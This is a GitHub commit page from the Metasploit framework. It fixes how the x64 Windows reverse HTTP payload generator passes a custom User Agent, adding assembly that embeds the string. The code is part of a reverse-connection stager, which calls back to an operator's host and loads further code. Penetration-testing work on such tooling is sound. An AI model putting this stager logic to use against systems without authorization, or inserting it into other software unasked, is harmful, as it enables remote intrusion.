Skip to content

Commit

Permalink
Landing rapid7#19726, fixed incorrect processing of HTTP User Agent p…
Browse files Browse the repository at this point in the history
…arameter in x64 reverse HTTP payload (Windows)
  • Loading branch information
msutovsky-r7 committed Dec 16, 2024
2 parents 50b1259 + 8af31e6 commit ebf7379
Showing 1 changed file with 15 additions and 2 deletions.
17 changes: 15 additions & 2 deletions lib/msf/core/payload/windows/x64/reverse_http_x64.rb
Original file line number Diff line number Diff line change
Expand Up @@ -62,7 +62,7 @@ def generate(opts={})
# Otherwise default to small URIs
conf[:url] = luri + generate_small_uri
end

generate_reverse_http(conf)
end

Expand Down Expand Up @@ -168,6 +168,7 @@ def asm_generate_ascii_array(str)
# @option opts [String] :url The URI to request during staging
# @option opts [String] :host The host to connect to
# @option opts [Integer] :port The port to connect to
# @option opts [String] :ua The User Agent the payload will use
# @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh
# @option opts [String] :proxy_host The optional proxy server host to use
# @option opts [Integer] :proxy_port The optional proxy server port to use
Expand Down Expand Up @@ -245,9 +246,21 @@ def asm_reverse_http(opts={})
internetopen:
push rbx ; stack alignment
push rbx ; NULL pointer
mov rcx, rsp ; lpszAgent ("")
^

if opts[:ua]
asm << %Q^
call load_useragent
db"#{opts[:ua]}", 0x00
load_useragent:
pop rcx ; lpszAgent (stack pointer)
^
else
asm << %Q^
mov rcx, rsp ; lpszAgent("")
^
end

if proxy_enabled
asm << %Q^
push 3
Expand Down

0 comments on commit ebf7379

Please sign in to comment.